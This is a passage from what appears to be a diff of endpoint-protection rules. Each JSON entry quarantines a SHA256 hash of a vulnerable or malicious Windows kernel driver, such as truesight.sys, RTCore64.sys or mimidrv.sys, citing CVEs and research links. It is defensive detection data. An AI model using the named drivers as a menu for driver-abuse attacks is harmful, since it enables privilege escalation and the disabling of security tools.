"4f286794-21a5-5ea3-b11e-d9d1c0929e73", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143562Z", + "creation_date": "2026-03-23T11:45:31.143564Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143570Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c66fd25fb23a21fdf502b1f750bd8d862e937eead46554c3c1d62eff67f549df", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4f32b263-13d1-559f-9e6e-341050406195", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144837Z", + "creation_date": "2026-03-23T11:45:32.144840Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:32.144845Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "146b8f4fc91a4915e8f6aa6e0d871f7161a809c46760ef602bab534836142436", + "comment": "Malicious Kernel Driver (aka driver_146b8f4f.sys) [https://www.loldrivers.io/drivers/cea8bd08-a3c5-4ae1-a568-387b909ada67/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4f3a832f-bfef-50fd-a3e1-5e0aaee846f0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827199Z", + "creation_date": "2026-03-23T11:45:30.827201Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827207Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "08e4f45807c9d9608d1d3283dad5d02c5714a47a7210e082f2607cd6d2f79bc9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4f4638e2-eb01-54a9-ad97-93d112a4f579", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.480370Z", + "creation_date": "2026-03-23T11:45:30.480372Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480378Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0abca92512fc98fe6c2e7d0a33935686fc3acbd0a4c68b51f4a70ece828c0664", + "comment": "Vulnerable Kernel Driver (aka GtcKmdfBs.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4f46a8a1-84fd-5f2a-beb1-d251287e51ca", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.467471Z", + "creation_date": "2026-03-23T11:45:30.467486Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.467495Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"8e1d02a67ad311f9e48d42813e6d208bda3e7e4da0d212d7b484a8454b41678c", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4f4b14dd-30ae-5b7c-83a8-65a29f65bc88", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981260Z", + "creation_date": "2026-03-23T11:45:29.981262Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981268Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7108613244f16c2279c3c917aa49cef8acf0b92fdaa9ace19bf5cf634360d727", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4f50fb48-6e83-5807-b7d8-c0abd0fc36d8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:31.807696Z", + "creation_date": "2026-03-23T11:45:31.807698Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.807703Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9b1a16363471806fd07cbac03ae3a929fa508d165f381c50ee79d540ce94a9a4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4f5532d8-407d-5833-b978-0dc63772040e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.830168Z", + "creation_date": "2026-03-23T11:45:31.830170Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.830176Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "29da9a13dabdb33a4693d67afb5a512d350c3a7de60fd93abf8880c55dde0e57", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file 
SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4f55ae57-a764-5f84-bb3f-377877f23a29", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.479015Z", + "creation_date": "2026-03-23T11:45:31.479019Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.479029Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "40bd99633a6b161cb5b9d3ba5e821e63a92839ae181a71b201bfe9d595010d63", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4f560968-6744-57d7-ae25-483535ba0209", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.452769Z", + "creation_date": "2026-03-23T11:45:30.452772Z", + "enabled": true, + "block_on_agent": true, + 
"quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.452781Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bb0742036c82709e02f25f98a9ff37c36a8c228bcaa98e40629fac8cde95b421", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4f5eaaa9-fd72-5286-bbcc-d2bde250b2d1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.483961Z", + "creation_date": "2026-03-23T11:45:31.483965Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.483974Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2751662b682d8283f3b271d70cd5a8f76c7560060af7587efc787d0331940fed", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4f6c8e0a-e3ca-5dec-8bed-9dc91ba326a9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148625Z", + "creation_date": "2026-03-23T11:45:31.148627Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148632Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1c3524fae1dcc6cf4c49e53ca87c38e116e2995acc0129ced0ca3d1691c9c135", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4f753c5b-5f0a-53d3-9f77-0af8d0a23cf3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143206Z", + "creation_date": "2026-03-23T11:45:32.143208Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143213Z", + "rule_level": null, + "rule_level_override": null, 
+ "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5f6547e9823f94c5b94af1fb69a967c4902f72b6e0c783804835e6ce27f887b0", + "comment": "Vulnerable Kernel Driver (aka iQVW64.SYS) [https://www.loldrivers.io/drivers/4dd3289c-522c-4fce-b48e-5370efc90fa1/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4f7a83da-48ac-5f8b-9582-a04352e7039d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622724Z", + "creation_date": "2026-03-23T11:45:29.622726Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622732Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bb68552936a6b0a68fb53ce864a6387d2698332aac10a7adfdd5a48b97027ce3", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4f8885a1-b372-5e69-bc49-a53da16a0550", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819446Z", + "creation_date": "2026-03-23T11:45:30.819449Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819454Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "87b4c5b7f653b47c9c3bed833f4d65648db22481e9fc54aa4a8c6549fa31712b", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4f8d7cab-3902-5fa4-8db3-9fe474e22899", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.809926Z", + "creation_date": "2026-03-23T11:45:31.809930Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809938Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d911a3bddb038fc57677c138abdc490b707b86886765f2c6d31fce50481f52f8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller 
(v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4f9f0197-c33f-5731-b4bd-9354f7936ca5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.491735Z", + "creation_date": "2026-03-23T11:45:31.491738Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.491746Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "435f57a97f28eca6fe5863aad3f365ec8fa65742576b5dbf9c0b853ca0e690e1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4f9f8c53-58c1-563a-8725-918d6f5fdc07", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:29.608892Z", + "creation_date": "2026-03-23T11:45:29.608894Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608900Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "79e3b14b68f1fcf805ccfe7bc2dc81b98346d2e83a6335816b276970e2e2691a", + "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4fa594b3-616b-5842-bc94-2c920f8b330f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.455788Z", + "creation_date": "2026-03-23T11:45:30.455791Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.455800Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c44b807e14e5da43a060cb36a83aa5b1e4b7b95620f9e41d289694f9daa8b77a", + "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"4fab0a1b-2cec-532a-a7f2-e480694c08ae", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813477Z", + "creation_date": "2026-03-23T11:45:31.813480Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813489Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "948c00a80392791ab7f28bb6ffa79032f2f3835748c8f4cacf23103d4826ff0f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4fae4450-c2dc-5f9f-8fb3-fe88cd88d3ba", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972422Z", + "creation_date": "2026-03-23T11:45:29.972424Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.972429Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dcd4d4bee76aacba8792df291eb55cc716752bd7ddb51ecb9bec491b02f57c70", + "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4fb9a891-b117-5654-9a9f-779015ad1fc3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822152Z", + "creation_date": "2026-03-23T11:45:30.822154Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822160Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0a1d5ba96cde7e8485077763e34738bf9c2734c81440ecab82ff63606a50dfb2", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4fc1c1e1-f7c3-5cbf-b05b-44db5062f96f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812729Z", + "creation_date": "2026-03-23T11:45:31.812732Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812740Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6079447f59d41c7e67e24d4cf90e1f4b18090f3f8db689b430fee7a4ab661379", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4fc4f610-2427-5618-913c-2bfd034b7535", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975735Z", + "creation_date": "2026-03-23T11:45:29.975737Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975742Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "bd1d579a15ec3c1120cc6e0c8ff6b265623980de3570a5dd2f57d0c5981334d8", + "comment": "Novell XTier vulnerable driver (aka libnicm.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4fcab462-89f6-5e29-ba56-6763655e83c7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971228Z", + "creation_date": "2026-03-23T11:45:29.971231Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 